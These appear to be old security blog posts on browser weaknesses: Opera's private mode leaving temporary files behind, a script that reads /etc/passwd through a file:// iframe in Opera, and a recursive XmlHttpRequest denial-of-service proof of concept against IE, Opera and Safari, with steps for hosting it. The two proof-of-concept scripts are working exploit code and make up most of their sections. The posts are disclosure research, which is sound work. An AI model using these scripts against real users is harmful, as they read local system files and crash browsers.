Private browsing in Opera is not so private actually

I've always been using Opera's private browsing when didn't want any history and other stuff to be saved locally. Always until I decided to take a look at how private it really is.
After some private browsing I navigated to ~/.opera/temporary_downloads and noticed that Opera stores some necessary files there. There were:

• crossdomain.xml (which may reveal domain you browsed in many cases)
• various swf files (which may reveal sensitive information when decompiled)
• strange video_related.htm file, which contained a lot of info
  

That's fine, but the actual problem is that Opera doesn't delete the files when closed. It only do this when opened in next time. It works so regardless private or usual navigation. And I doubt anyone opens Opera again just to clear files after private browsing.
So, Opera's private browsing is not so private actually.

Opera and access to file:// iframes

It's just a quick thought about getting content of iframes with file:// sources. While Firefox and Chrome don't alllow access to contentWindow and contentDocument properties of iframes with file:// sources, Opera and Internet Explorer don't have such security policies.

It's possible to get access to it in case when original file with iframe is saved locally. This way, Opera and Internet Explorer render file iframe and, as long as protocols match, which is required for contentWindow and contentDocument properties, allow reading it (actually, Firefox lets this too, but it also compares path to file - if they differ, it throws security exception).

So, we force user to save webpage locally (as HTML file) and to open it. In case of IE, however, it won't execute Javascript by default. Still, Opera lets us do it.

Here is a proof-of-concept just for fun:

<body />
<script>
  iframe = document.createElement('iframe');
  iframe.src = 'file://localhost/etc/passwd';
  document.body.appendChild(iframe);
  info = iframe.contentWindow.document.body.innerHTML;
  alert(info);
</script>

P.S. Wow, I don't really know what does it mean, but Safari runs Windows Explorer with the path of such iframes.

IE 7.x/8.x, Opera 10.x, Safari 4.x DoS PoC

While playing around with cross-domain requests, I've noticed that page, containing cycled XmlHttpRequest leads to violation of normal behavior of different browsers.
MS Internet Explorer 7.x/8.x (haven't got 6.x, but sure it's affected) begins to devour system resources (CPU and memory), shows error message "Stack Overflow at line: 43" and stops processing the page in few seconds.
Opera 10.x crashes in few seconds and its crash probably may lead to execution of shellcode (debugged it with WinDbg and !exploitable).
Apple Safari 4.x simply hangs, devouring system resources.
However, Mozilla Firefox 3.5 and Google Chrome can handle this exploit.
Vendors have been contacted, but no reaction.
I've posted this very dirty PoC at sla.ckers and finally it's here.
So, to test this PoC, create a page containing exploit, place it to your local webserver (any LAMP) or website and open it.
PoC contains cross-domain XmlHttp function and cycled asynchronous XmlHttpRequest.

<script>
  function getXmlHttp(){
    var xmlhttp;
    try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
    try {
      xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (E) {
      xmlhttp = false;
    }
  }

  if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
    xmlhttp = new XMLHttpRequest();
  }
  return xmlhttp;
  }
</script>
<script>
  function getXmlHttpSploit(){
    var xmlhttp = getXmlHttp()
    xmlhttp.open('GET', 'nonexistentpage', false);
    xmlhttp.send(null);
    if(xmlhttp.status == 404) {
      getXmlHttpSploit();
    }
  }
</script>
<script>
  var xmlhttp = getXmlHttp()
  xmlhttp.open('GET', 'nonexistentpage', true);
  xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
      if(xmlhttp.status == 404) {
        getXmlHttpSploit();
      }
    }
  };
  xmlhttp.send(null);
</script>